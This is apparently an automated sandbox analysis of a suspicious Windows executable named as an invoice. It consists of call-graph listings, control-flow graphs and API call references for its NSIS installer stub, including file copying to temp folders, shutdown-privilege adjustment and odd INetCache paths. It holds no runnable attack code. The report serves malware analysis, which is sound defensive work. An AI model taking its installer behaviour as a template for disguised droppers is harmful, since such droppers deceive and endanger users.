4737 403358 ReadFile 4736->4737 4740 402fe8 4737->4740 4738 402d9f 33 API calls 4738->4746 4741 403024 CreateFileW 4739->4741 4740->4731 4740->4747 4742 40305e 4741->4742 4741->4747 4854 40336e SetFilePointer 4742->4854 4744 40306c 4745 4030e7 45 API calls 4744->4745 4745->4747 4746->4727 4746->4729 4746->4732 4746->4738 4746->4747 4747->4636 4749 406558 5 API calls 4748->4749 4750 4039db 4749->4750 4751 4039e1 4750->4751 4752 4039f3 4750->4752 4865 4060c5 wsprintfW 4751->4865 4753 40604b 3 API calls 4752->4753 4754 403a23 4753->4754 4756 403a42 lstrcatW 4754->4756 4758 40604b 3 API calls 4754->4758 4757 4039f1 4756->4757 4856 403c9d 4757->4856 4758->4756 4761 405c3a 18 API calls 4762 403a74 4761->4762 4763 403b08 4762->4763 4765 40604b 3 API calls 4762->4765 4764 405c3a 18 API calls 4763->4764 4766 403b0e 4764->4766 4767 403aa6 4765->4767 4768 403b1e LoadImageW 4766->4768 4769 4061a0 18 API calls 4766->4769 4767->4763 4772 403ac7 lstrlenW 4767->4772 4776 405b5f CharNextW 4767->4776 4770 403bc4 4768->4770 4771 403b45 RegisterClassW 4768->4771 4769->4768 4775 40140b 2 API calls 4770->4775 4773 403bce 4771->4773 4774 403b7b SystemParametersInfoW CreateWindowExW 4771->4774 4777 403ad5 lstrcmpiW 4772->4777 4778 403afb 4772->4778 4773->4693 4774->4770 4779 403bca 4775->4779 4781 403ac4 4776->4781 4777->4778 4782 403ae5 GetFileAttributesW 4777->4782 4780 405b32 3 API calls 4778->4780 4779->4773 4783 403c9d 19 API calls 4779->4783 4784 403b01 4780->4784 4781->4772 4785 403af1 4782->4785 4787 403bdb 4783->4787 4866 40617e lstrcpynW 4784->4866 4785->4778 4786 405b7e 2 API calls 4785->4786 4786->4778 4789 403be7 ShowWindow 4787->4789 4790 403c6a 4787->4790 4792 4064e8 3 API calls 4789->4792 4867 4053b0 OleInitialize 4790->4867 4795 403bff 4792->4795 4793 403c70 4794 403c8c 4793->4794 4797 403c74 4793->4797 4798 40140b 2 API calls 4794->4798 4796 403c0d GetClassInfoW 4795->4796 4799 4064e8 3 API calls 4795->4799 4800 403c21 GetClassInfoW RegisterClassW 4796->4800 4801 403c37 DialogBoxParamW 4796->4801 4797->4773 4802 40140b 2 API calls 4797->4802 4798->4773 4799->4796 4800->4801 4803 40140b 2 API calls 4801->4803 4802->4773 4803->4773 4804->4639 4875 40617e lstrcpynW 4805->4875 4807 405c4b 4876 405bdd CharNextW CharNextW 4807->4876 4810 4036d5 4810->4693 4819 40617e lstrcpynW 4810->4819 4811 406412 5 API calls 4817 405c61 4811->4817 4812 405c92 lstrlenW 4813 405c9d 4812->4813 4812->4817 4814 405b32 3 API calls 4813->4814 4816 405ca2 GetFileAttributesW 4814->4816 4815 4064c1 2 API calls 4815->4817 4816->4810 4817->4810 4817->4812 4817->4815 4818 405b7e 2 API calls 4817->4818 4818->4812 4819->4673 4820->4640 4822 4038f0 4821->4822 4823 4038e6 CloseHandle 4821->4823 4824 403904 4822->4824 4825 4038fa CloseHandle 4822->4825 4823->4822 4882 403932 4824->4882 4825->4824 4831 406558 5 API calls 4830->4831 4832 403734 lstrcatW 4831->4832 4832->4667 4832->4668 4834 403776 4833->4834 4835 4057fd GetLastError 4833->4835 4834->4681 4835->4834 4836 40580c SetFileSecurityW 4835->4836 4836->4834 4837 405822 GetLastError 4836->4837 4837->4834 4839 405839 4838->4839 4840 40583d GetLastError 4838->4840 4839->4681 4840->4839 4841->4682 4842->4686 4844 406040 4843->4844 4845 406033 4843->4845 4844->4686 4935 405ead lstrcpyW 4845->4935 4847->4720 4848->4722 4850 405b8c 4849->4850 4851 405b92 CharPrevW 4850->4851 4852 402ead 4850->4852 4851->4850 4851->4852 4853 40617e lstrcpynW 4852->4853 4853->4726 4854->4744 4855->4736 4857 403cb1 4856->4857 4874 4060c5 wsprintfW 4857->4874 4859 403d22 4860 4061a0 18 API calls 4859->4860 4861 403d2e SetWindowTextW 4860->4861 4862 403a52 4861->4862 4863 403d4a 4861->4863 4862->4761 4863->4862 4864 4061a0 18 API calls 4863->4864 4864->4863 4865->4757 4866->4763 4868 40428e SendMessageW 4867->4868 4872 4053d3 4868->4872 4869 4053fa 4870 40428e SendMessageW 4869->4870 4871 40540c OleUninitialize 4870->4871 4871->4793 4872->4869 4873 401389 2 API calls 4872->4873 4873->4872 4874->4859 4875->4807 4877 405bfa 4876->4877 4878 405c0c 4876->4878 4877->4878 4879 405c07 CharNextW 4877->4879 4880 405b5f CharNextW 4878->4880 4881 405c30 4878->4881 4879->4881 4880->4878 4881->4810 4881->4811 4883 403940 4882->4883 4884 403909 4883->4884 4885 403945 FreeLibrary GlobalFree 4883->4885 4886 40596f 4884->4886 4885->4884 4885->4885 4887 405c3a 18 API calls 4886->4887 4888 40598f 4887->4888 4889 405997 DeleteFileW 4888->4889 4890 4059ae 4888->4890 4891 403708 OleUninitialize 4889->4891 4892 405ad9 4890->4892 4925 40617e lstrcpynW 4890->4925 4891->4649 4891->4650 4892->4891 4897 4064c1 2 API calls 4892->4897 4894 4059d4 4895 4059e7 4894->4895 4896 4059da lstrcatW 4894->4896 4899 405b7e 2 API calls 4895->4899 4898 4059ed 4896->4898 4900 405af3 4897->4900 4901 4059fd lstrcatW 4898->4901 4902 405a08 lstrlenW FindFirstFileW 4898->4902 4899->4898 4900->4891 4903 405af7 4900->4903 4901->4902 4904 405ace 4902->4904 4923 405a2a 4902->4923 4905 405b32 3 API calls 4903->4905 4904->4892 4906 405afd 4905->4906 4908 405927 5 API calls 4906->4908 4907 405ab1 FindNextFileW 4911 405ac7 FindClose 4907->4911 4907->4923 4910 405b09 4908->4910 4912 405b23 4910->4912 4913 405b0d 4910->4913 4911->4904 4915 4052dd 25 API calls 4912->4915 4913->4891 4916 4052dd 25 API calls 4913->4916 4915->4891 4918 405b1a 4916->4918 4917 40596f 62 API calls 4917->4923 4920 40601f 38 API calls 4918->4920 4919 4052dd 25 API calls 4919->4907 4922 405b21 4920->4922 4921 4052dd 25 API calls 4921->4923 4922->4891 4923->4907 4923->4917 4923->4919 4923->4921 4924 40601f 38 API calls 4923->4924 4926 40617e lstrcpynW 4923->4926 4927 405927 4923->4927 4924->4923 4925->4894 4926->4923 4928 405d2e 2 API calls 4927->4928 4930 405933 4928->4930 4929 405954 4929->4923 4930->4929 4931 405942 RemoveDirectoryW 4930->4931 4932 40594a DeleteFileW 4930->4932 4933 405950 4931->4933 4932->4933 4933->4929 4934 405960 SetFileAttributesW 4933->4934 4934->4929 4936 405ed5 4935->4936 4937 405efb GetShortPathNameW 4935->4937 4962 405d53 GetFileAttributesW CreateFileW 4936->4962 4939 405f10 4937->4939 4940 40601a 4937->4940 4939->4940 4942 405f18 wsprintfA 4939->4942 4940->4844 4941 405edf CloseHandle GetShortPathNameW 4941->4940 4944 405ef3 4941->4944 4943 4061a0 18 API calls 4942->4943 4945 405f40 4943->4945 4944->4937 4944->4940 4963 405d53 GetFileAttributesW CreateFileW 4945->4963 4947 405f4d 4947->4940 4948 405f5c GetFileSize GlobalAlloc 4947->4948 4949 406013 CloseHandle 4948->4949 4950 405f7e 4948->4950 4949->4940 4951 405dd6 ReadFile 4950->4951 4952 405f86 4951->4952 4952->4949 4964 405cb8 lstrlenA 4952->4964 4955 405fb1 4958 405cb8 4 API calls 4955->4958 4956 405f9d lstrcpyA 4957 405fbf 4956->4957 4959 405ff6 SetFilePointer 4957->4959 4958->4957 4960 405e05 WriteFile 4959->4960 4961 40600c GlobalFree 4960->4961 4961->4949 4962->4941 4963->4947 4965 405cf9 lstrlenA 4964->4965 4966 405cd2 lstrcmpiA 4965->4966 4968 405d01 4965->4968 4967 405cf0 CharNextA 4966->4967 4966->4968 4967->4965 4968->4955 4968->4956 4969 401b37 4970 401b44 4969->4970 4971 401b88 4969->4971 4974 401bcd 4970->4974 4978 401b5b 4970->4978 4972 401bb2 GlobalAlloc 4971->4972 4973 401b8d 4971->4973 4975 4061a0 18 API calls 4972->4975 4980 402288 4973->4980 4990 40617e lstrcpynW 4973->4990 4976 4061a0 18 API calls 4974->4976 4974->4980 4975->4974 4982 402282 4976->4982 4988 40617e lstrcpynW 4978->4988 4979 401b9f GlobalFree 4979->4980 4984 4058c3 MessageBoxIndirectW 4982->4984 4983 401b6a 4989 40617e lstrcpynW 4983->4989 4984->4980 4986 401b79 4991 40617e lstrcpynW 4986->4991 4988->4983 4989->4986 4990->4979 4991->4980 5806 402537 5807 402562 5806->5807 5808 40254b 5806->5808 5810 402596 5807->5810 5811 402567 5807->5811 5809 402ba2 18 API calls 5808->5809 5817 402552 5809->5817 5813 402bbf 18 API calls 5810->5813 5812 402bbf 18 API calls 5811->5812 5814 40256e WideCharToMultiByte lstrlenA 5812->5814 5815 40259d lstrlenW 5813->5815 5814->5817 5815->5817 5816 4025e0 5817->5816 5819 405e34 5 API calls 5817->5819 5820 4025ca 5817->5820 5818 405e05 WriteFile 5818->5816 5819->5820 5820->5816 5820->5818 5821 4014b8 5822 4014be 5821->5822 5823 401389 2 API calls 5822->5823 5824 4014c6 5823->5824 5072 4015b9 5073 402bbf 18 API calls 5072->5073 5074 4015c0 5073->5074 5075 405bdd 4 API calls 5074->5075 5087 4015c9 5075->5087 5076 401629 5078 40165b 5076->5078 5079 40162e 5076->5079 5077 405b5f CharNextW 5077->5087 5082 401423 25 API calls 5078->5082 5080 401423 25 API calls 5079->5080 5081 401635 5080->5081 5091 40617e lstrcpynW 5081->5091 5089 401653 5082->5089 5084 405829 2 API calls 5084->5087 5085 405846 5 API calls 5085->5087 5086 401642 SetCurrentDirectoryW 5086->5089 5087->5076 5087->5077 5087->5084 5087->5085 5088 40160f GetFileAttributesW 5087->5088 5090 4057ac 4 API calls 5087->5090 5088->5087 5090->5087 5091->5086 5832 40293b 5833 402ba2 18 API calls 5832->5833 5834 402941 5833->5834 5835 402964 5834->5835 5836 40297d 5834->5836 5845 40281e 5834->5845 5837 402969 5835->5837 5838 40297a 5835->5838 5839 402993 5836->5839 5840 402987 5836->5840 5846 40617e lstrcpynW 5837->5846 5847 4060c5 wsprintfW 5838->5847 5842 4061a0 18 API calls 5839->5842 5841 402ba2 18 API calls 5840->5841 5841->5845 5842->5845 5846->5845 5847->5845 5848 10002a7f 5849 10002a97 5848->5849 5850 1000158f 2 API calls 5849->5850 5851 10002ab2 5850->5851

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 4033b6-4033e9 SetErrorMode GetVersion 1 4033eb-4033f3 call 406558 0->1 2 4033fc 0->2 1->2 8 4033f5 1->8 4 403401-403415 call 4064e8 lstrlenA 2->4 9 403417-40348b call 406558 * 2 #17 OleInitialize SHGetFileInfoW call 40617e GetCommandLineW call 40617e GetModuleHandleW 4->9 8->2 18 403495-4034af call 405b5f CharNextW 9->18 19 40348d-403494 9->19 22 4034b5-4034bb 18->22 23 4035c6-4035e0 GetTempPathW call 403385 18->23 19->18 25 4034c4-4034c8 22->25 26 4034bd-4034c2 22->26 32 4035e2-403600 GetWindowsDirectoryW lstrcatW call 403385 23->32 33 403638-403652 DeleteFileW call 402e41 23->33 27 4034ca-4034ce 25->27 28 4034cf-4034d3 25->28 26->25 26->26 27->28 30 403592-40359f call 405b5f 28->30 31 4034d9-4034df 28->31 46 4035a1-4035a2 30->46 47 4035a3-4035a9 30->47 35 4034e1-4034e9 31->35 36 4034fa-403533 31->36 32->33 52 403602-403632 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403385 32->52 48 403703-403713 call 4038d5 OleUninitialize 33->48 49 403658-40365e 33->49 41 4034f0 35->41 42 4034eb-4034ee 35->42 43 403550-40358a 36->43 44 403535-40353a 36->44 41->36 42->36 42->41 43->30 51 40358c-403590 43->51 44->43 50 40353c-403544 44->50 46->47 47->22 53 4035af 47->53 69 403839-40383f 48->69 70 403719-403729 call 4058c3 ExitProcess 48->70 54 4036f3-4036fa call 4039c7 49->54 55 403664-40366f call 405b5f 49->55 57 403546-403549 50->57 58 40354b 50->58 51->30 59 4035b1-4035bf call 40617e 51->59 52->33 52->48 61 4035c4 53->61 68 4036ff 54->68 73 403671-4036a6 55->73 74 4036bd-4036c7 55->74 57->43 57->58 58->43 59->61 61->23 68->48 71 403841-403857 GetCurrentProcess OpenProcessToken 69->71 72 4038bd-4038c5 69->72 76 403859-403887 LookupPrivilegeValueW AdjustTokenPrivileges 71->76 77 40388d-40389b call 406558 71->77 79 4038c7 72->79 80 4038cb-4038cf ExitProcess 72->80 78 4036a8-4036ac 73->78 81 4036c9-4036d7 call 405c3a 74->81 82 40372f-403743 call 405846 lstrcatW 74->82 76->77 96 4038a9-4038b4 ExitWindowsEx 77->96 97 40389d-4038a7 77->97 85 4036b5-4036b9 78->85 86 4036ae-4036b3 78->86 79->80 81->48 93 4036d9-4036ef call 40617e * 2 81->93 94 403750-40376a lstrcatW lstrcmpiW 82->94 95 403745-40374b lstrcatW 82->95 85->78 91 4036bb 85->91 86->85 86->91 91->74 93->54 94->48 99 40376c-40376f 94->99 95->94 96->72 100 4038b6-4038b8 call 40140b 96->100 97->96 97->100 102 403771-403776 call 4057ac 99->102 103 403778 call 405829 99->103 100->72 111 40377d-40378b SetCurrentDirectoryW 102->111 103->111 112 403798-4037c1 call 40617e 111->112 113 40378d-403793 call 40617e 111->113 117 4037c6-4037e2 call 4061a0 DeleteFileW 112->117 113->112 120 403823-40382b 117->120 121 4037e4-4037f4 CopyFileW 117->121 120->117 123 40382d-403834 call 40601f 120->123 121->120 122 4037f6-403816 call 40601f call 4061a0 call 40585e 121->122 122->120 132 403818-40381f CloseHandle 122->132 123->48 132->120
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.KERNELBASE ref: 004033D9
                                                                                                                                                                                                                          • GetVersion.KERNEL32 ref: 004033DF
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403408
                                                                                                                                                                                                                          • #17.COMCTL32(00000007,00000009), ref: 0040342B
                                                                                                                                                                                                                          • OleInitialize.OLE32(00000000), ref: 00403432
                                                                                                                                                                                                                          • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 0040344E
                                                                                                                                                                                                                          • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 00403463
                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000), ref: 00403476
                                                                                                                                                                                                                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000020), ref: 0040349D
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
                                                                                                                                                                                                                            • Part of subcall function 00406558: GetProcAddress.KERNEL32(00000000,?), ref: 00406585
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 004035D7
                                                                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004035E8
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035F4
                                                                                                                                                                                                                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403608
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403610
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403621
                                                                                                                                                                                                                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403629
                                                                                                                                                                                                                          • DeleteFileW.KERNELBASE(1033), ref: 0040363D
                                                                                                                                                                                                                            • Part of subcall function 0040617E: lstrcpynW.KERNEL32(?,?,00000400,00403463,00429240,NSIS Error), ref: 0040618B
                                                                                                                                                                                                                          • OleUninitialize.OLE32(?), ref: 00403708
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00403729
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 0040373C
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 0040374B
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 00403756
                                                                                                                                                                                                                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\FACTURA A-7507_H1758.exe",00000000,?), ref: 00403762
                                                                                                                                                                                                                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 0040377E
                                                                                                                                                                                                                          • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,868,?), ref: 004037D8
                                                                                                                                                                                                                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,00420EE8,?), ref: 004037EC
                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 00403819
                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403848
                                                                                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 0040384F
                                                                                                                                                                                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403864
                                                                                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32 ref: 00403887
                                                                                                                                                                                                                          • ExitWindowsEx.USER32(00000002,80040002), ref: 004038AC
                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 004038CF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\FACTURA A-7507_H1758.exe"$.tmp$1033$868$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\kolonibestyrernes\Nonperpetration\Varmluftsovn$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA A-7507_H1758.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                                                          • API String ID: 2488574733-2004844323
                                                                                                                                                                                                                          • Opcode ID: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                                                                                                                                                                          • Instruction ID: be8551fa6605ebbbfda7487142ffb020be8bd547a3943651712312bea09c5587
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8223e16c8a6003b83d058067bded84b497836c53eb7fdc95fb885acef81e31
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AED10571200300ABE7207F659D49A2B3AEDEB4074AF50443FF881B62D2DB7C8956876E

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 133 404c59-404ca5 GetDlgItem * 2 134 404ec6-404ecd 133->134 135 404cab-404d3f GlobalAlloc LoadBitmapW SetWindowLongW ImageList_Create ImageList_AddMasked SendMessageW * 2 133->135 136 404ee1 134->136 137 404ecf-404edf 134->137 138 404d41-404d4c SendMessageW 135->138 139 404d4e-404d55 DeleteObject 135->139 140 404ee4-404eed 136->140 137->140 138->139 141 404d57-404d5f 139->141 142 404ef8-404efe 140->142 143 404eef-404ef2 140->143 144 404d61-404d64 141->144 145 404d88-404d8c 141->145 149 404f00-404f07 142->149 150 404f0d-404f14 142->150 143->142 146 404fdc-404fe3 143->146 147 404d66 144->147 148 404d69-404d86 call 4061a0 SendMessageW * 2 144->148 145->141 151 404d8e-404dba call 404242 * 2 145->151 156 405054-40505c 146->156 157 404fe5-404feb 146->157 147->148 148->145 149->146 149->150 153 404f16-404f19 150->153 154 404f89-404f8c 150->154 193 404dc0-404dc6 151->193 194 404e85-404e98 GetWindowLongW SetWindowLongW 151->194 162 404f24-404f39 call 404ba7 153->162 163 404f1b-404f22 153->163 154->146 158 404f8e-404f98 154->158 160 405066-40506d 156->160 161 40505e-405064 SendMessageW 156->161 165 404ff1-404ffb 157->165 166 40523c-40524e call 4042a9 157->166 168 404fa8-404fb2 158->168 169 404f9a-404fa6 SendMessageW 158->169 170 4050a1-4050a8 160->170 171 40506f-405076 160->171 161->160 162->154 192 404f3b-404f4c 162->192 163->154 163->162 165->166 174 405001-405010 SendMessageW 165->174 168->146 177 404fb4-404fbe 168->177 169->168 182 4051fe-405205 170->182 183 4050ae-4050ba call 4011ef 170->183 178 405078-405079 ImageList_Destroy 171->178 179 40507f-405086 171->179 174->166 175 405016-405027 SendMessageW 174->175 185 405031-405033 175->185 186 405029-40502f 175->186 188 404fc0-404fcd 177->188 189 404fcf-404fd9 177->189 178->179 190 405088-405089 GlobalFree 179->190 191 40508f-40509b 179->191 182->166 187 405207-40520e 182->187 203 4050ca-4050cd 183->203 204 4050bc-4050bf 183->204 196 405034-40504d call 401299 SendMessageW 185->196 186->185 186->196 187->166 197 405210-40523a ShowWindow GetDlgItem ShowWindow 187->197 188->146 189->146 190->191 191->170 192->154 199 404f4e-404f50 192->199 200 404dc9-404dd0 193->200 198 404e9e-404ea2 194->198 196->156 197->166 206 404ea4-404eb7 ShowWindow call 404277 198->206 207 404ebc-404ec4 call 404277 198->207 208 404f52-404f59 199->208 209 404f63 199->209 201 404e66-404e79 200->201 202 404dd6-404dfe 200->202 201->200 216 404e7f-404e83 201->216 210 404e00-404e36 SendMessageW 202->210 211 404e38-404e3a 202->211 217 40510e-405132 call 4011ef 203->217 218 4050cf-4050e8 call 4012e2 call 401299 203->218 213 4050c1 204->213 214 4050c2-4050c5 call 404c27 204->214 206->166 207->134 221 404f5b-404f5d 208->221 222 404f5f-404f61 208->222 212 404f66-404f82 call 40117d 209->212 210->201 223 404e3c-404e4b SendMessageW 211->223 224 404e4d-404e63 SendMessageW 211->224 212->154 213->214 214->203 216->194 216->198 235 4051d4-4051e8 InvalidateRect 217->235 236 405138 217->236 240 4050f8-405107 SendMessageW 218->240 241 4050ea-4050f0 218->241 221->212 222->212 223->201 224->201 235->182 239 4051ea-4051f9 call 404b7a call 404b62 235->239 237 40513b-405146 236->237 242 405148-405157 237->242 243 4051bc-4051ce 237->243 239->182 240->217 248 4050f2 241->248 249 4050f3-4050f6 241->249 246 405159-405166 242->246 247 40516a-40516d 242->247 243->235 243->237 246->247 251 405174-40517d 247->251 252 40516f-405172 247->252 248->249 249->240 249->241 253 405182-4051ba SendMessageW * 2 251->253 254 40517f 251->254 252->253 253->243 254->253
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003F9), ref: 00404C71
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000408), ref: 00404C7C
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CC6
                                                                                                                                                                                                                          • LoadBitmapW.USER32(0000006E), ref: 00404CD9
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000FC,00405251), ref: 00404CF2
                                                                                                                                                                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D06
                                                                                                                                                                                                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D18
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001109,00000002), ref: 00404D2E
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D3A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D4C
                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 00404D4F
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D7A
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D86
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E1C
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E47
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E5B
                                                                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404E8A
                                                                                                                                                                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404E98
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000005), ref: 00404EA9
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FA6
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040500B
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405020
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405044
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405064
                                                                                                                                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 00405079
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00405089
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405102
                                                                                                                                                                                                                          • SendMessageW.USER32(?,00001102,?,?), ref: 004051AB
                                                                                                                                                                                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051BA
                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,?), ref: 004051DA
                                                                                                                                                                                                                          • ShowWindow.USER32(?,00000000), ref: 00405228
                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003FE), ref: 00405233
                                                                                                                                                                                                                          • ShowWindow.USER32(00000000), ref: 0040523A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
